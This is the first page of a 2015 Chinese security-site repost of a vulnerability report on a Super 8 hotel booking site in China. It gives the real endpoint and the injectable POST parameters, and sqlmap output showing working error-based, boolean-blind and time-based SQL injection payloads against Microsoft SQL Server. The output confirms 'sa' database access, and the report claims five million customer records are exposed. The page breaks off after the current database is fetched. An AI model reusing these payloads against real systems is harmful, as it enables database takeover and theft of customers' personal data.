欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

速8酒店某站存在多处SQL绕过注入(DBA权限+五百万客户信息泄漏)

来源:本站整理 作者:路人甲 时间:2015-09-28 TAG: 我要投稿

http://cp.super8.com.cn/Hotel/List或者http://cp.super8.com.cn/抓包
http://cp.super8.com.cn/Hotel/HotelList (POST)
stime=2015-09-01&etime=2015-09-
02&roomnum=1&citycode=110100&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesi
ze=9
citycode、honour、servercs存在注入(还可以测试下cookie中的参数或者referer的注入试试!~~~)
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: honour
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode
=228&servercs=&honour=-4628) OR 7763=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHA
R(106)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (7763=7763) THEN CHAR(49) ELSE CHA
R(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND (4155=4155&p
ageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode
=228&servercs=&honour=-4048) OR 3047=(SELECT COUNT(*) FROM sysusers AS sys1,sysu
sers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6
,sysusers AS sys7) AND (8777=8777&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=
9
Place: POST
Parameter: citycode
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 2
424=2424 AND ('aDZF'='aDZF&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&
landMrk=&djq=&pagesize=9
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 3
376=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(104)+CHAR(113)+(SELEC
T (CASE WHEN (3376=3376) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+C
HAR(112)+CHAR(102)+CHAR(113))) AND ('QfCW'='QfCW&keycode=228&servercs=&honour=&p
ageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 7
647=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sys
users AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('iwOc'='i
wOc&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=
9
Place: POST
Parameter: servercs
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode
=228&servercs=-6013) OR 1049=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+C
HAR(104)+CHAR(113)+(SELECT (CASE WHEN (1049=1049) THEN CHAR(49) ELSE CHAR(48) EN
D))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND (3379=3379&honour=&p
ageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode
=228&servercs=-1418) OR 3789=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS
sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysuser
s AS sys7) AND (5903=5903&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=
9
---
[01:57:05] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
there were multiple injection points, please select the one to use for following
 injections:
[0] place: POST, parameter: citycode, type: Single quoted string (default)
[1] place: POST, parameter: honour, type: Unescaped numeric
[2] place: POST, parameter: servercs, type: Unescaped numeric
[q] Quit
> 0
[02:00:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012
[02:00:23] [INFO] fetching current user
[02:00:23] [INFO] resumed: sa
current user:    'sa'
[02:00:23] [INFO] fetching current database
[02:00:23] [INFO] resumed: crs2
current database:    'crs2'

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载